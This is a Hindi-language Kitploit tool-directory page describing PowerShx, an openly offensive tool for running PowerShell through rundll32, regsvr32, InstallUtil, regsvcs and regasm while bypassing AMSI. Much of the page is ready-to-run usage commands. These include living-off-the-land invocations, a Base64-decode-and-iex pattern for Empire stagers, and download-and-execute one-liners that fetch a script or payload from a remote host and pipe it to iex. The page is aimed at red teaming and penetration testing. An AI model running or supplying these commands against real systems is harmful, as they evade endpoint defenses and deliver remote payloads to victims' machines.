Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PowerShx — बिना सॉफ़्टवेयर प्रतिबंधों के Powershell चलाएं। | Kitploit
उपकरण/GitHubGitHub/iomoath/powershx
रक्षात्मक उपकरणविशेषाधिकार वृद्धिपेलोड जनरेशनआईडीएस/आईपीएस से बचनापार्श्व आंदोलनस्क्रिप्टिंग और स्वचालनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubiomoath/powershx

PowerShx

281464 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

बिना सॉफ़्टवेयर प्रतिबंधों के Powershell चलाएं।

रिपॉजिटरी देखें

SharpShx


DLL या एक स्वतंत्र निष्पादनयोग्य (executable) का उपयोग करके अनमैनेज्ड PowerShell निष्पादन।

परिचय

PowerShx, PowerShdll प्रोजेक्ट का पुनर्लेखन और विस्तार है। PowerShx AMSI को बायपास करने और PS Cmdlets चलाने के लिए कार्यक्षमताएँ प्रदान करता है।

विशेषताएँ

  • rundll32.exe, installutil.exe, regsvcs.exe या regasm.exe, regsvr32.exe का उपयोग करके DLL के साथ PowerShell चलाएं।
  • powershell.exe या powershell_ise.exe के बिना PowerShell चलाएं।
  • AMSI बायपास सुविधाएँ।
  • कमांड लाइन से सीधे PowerShell स्क्रिप्ट या PowerShell फ़ाइलें चलाएं।
  • PowerShell मॉड्यूल आयात करें और PowerShell Cmdlets निष्पादित करें।

उपयोग

.dll संस्करण

rundll32

root@kitploit:~
rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path>                    Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet>     Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w                           Start an interactive console in a new window
rundll32 PowerShx.dll,main -i                           Start an interactive console
rundll32 PowerShx.dll,main -s                           Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v                           Print Execution Output to the console

विकल्प (इन तकनीकों के लिए SubTee को श्रेय):

root@kitploit:~
1. 
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4. 
    regsvr32 /s  /u PowerShx.dll -->Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe संस्करण

root@kitploit:~
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e                          <PS script to run>
PowerShx.exe -f <path>                   Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet>    Load a script and run a PS cmdlet
PowerShx.exe -s                          Attempt to bypass AMSI.

एम्बेडेड पेलोड

"Common" प्रोजेक्ट में डेटा डिक्शनरी "Common.Payloads.PayloadDict" को अपडेट करके और PsSession.cs → Handle() विधि में इसे कॉल करके पेलोड एम्बेड किए जा सकते हैं। उदाहरण: Handle() विधि में:

root@kitploit:~
private void Handle(Options options)
{
  // Pre-execution before user script
  _ps.Exe(Payloads.PayloadDict["amsi"]);
}

उदाहरण

बेस64 एन्कोडेड स्क्रिप्ट चलाएं

root@kitploit:~
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

नोट: Empire स्टेजर्स को [System.Text.Encoding]::Unicode का उपयोग करके डिकोड करने की आवश्यकता है।

किसी वेबसाइट से स्क्रिप्ट डाउनलोड करें

root@kitploit:~
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

आवश्यकताएँ

.NET 4

ज्ञात समस्याएँ

कुछ त्रुटियाँ आउटपुट में दिखाई नहीं देती हैं। हो सकता है कि Import-Module जैसे कमांड असफल होने पर त्रुटि आउटपुट न करें। सुनिश्चित करें कि आपने अपने कमांड सही ढंग से टाइप किए हैं।

dll मोड में, इंटरैक्टिव मोड और कमांड आउटपुट पेरेंट प्रोसेस के कंसोल को हाईजैक करने पर निर्भर करते हैं। यदि पेरेंट प्रोसेस में कंसोल नहीं है, तो आउटपुट न दिखाने के लिए -n स्विच का उपयोग करें अन्यथा एप्लिकेशन क्रैश हो जाएगा।

Rundll32 के आर्गुमेंट्स को संभालने के तरीके के कारण, स्विच और आर्गुमेंट्स के बीच कई स्पेस वर्णों का उपयोग करने से समस्याएँ हो सकती हैं। स्क्रिप्ट के अंदर कई स्पेस ठीक हैं।

टूल डाउनलोड करें